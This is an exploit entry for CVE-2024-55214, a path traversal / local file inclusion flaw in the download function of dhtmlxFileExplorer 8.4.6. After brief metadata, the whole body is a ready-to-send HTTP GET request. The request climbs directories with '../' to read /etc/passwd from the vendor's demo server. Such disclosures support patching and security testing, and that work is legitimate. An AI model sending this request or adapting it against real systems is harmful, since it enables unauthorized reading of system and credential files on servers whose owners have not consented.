# Exploit Title: dhtmlxFileExplorer 8.4.6 - Local File Inclusion in the Download Function of File Explorer
# Date: Feb 6, 2025
# Exploit Author: Nutchaya Augkanavitayakul, Nattachai Wanmak, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://dhtmlx.com
# Software Link: https://dhtmlx.com
# Version: 8.4.6
# Tested on: macOS
# CVE : CVE-2024-55214

GET /docs/products/demoApps/dhtmlxFileExplorerDemo/backend/download?path=/root_ui346174140464/My%20files/../../../../../../../../etc/passwd HTTP/1.1
Host: dhtmlx.com
Cookie: _gcl_au=1.1.1418928943.1730870702; _gid=GA1.2.1885390698.1730870702; _ym_uid=1730870703147102827; _ym_d=1730870703; _ym_isad=2; _ym_visorc=w; _ga_N87XPB4GSG=GS1.1.1730870702.1.1.1730871454.44.0.0; _ga=GA1.2.1785201866.1730870702
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://dhtmlx.com/docs/products/demoApps/dhtmlxFileExplorerDemo/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive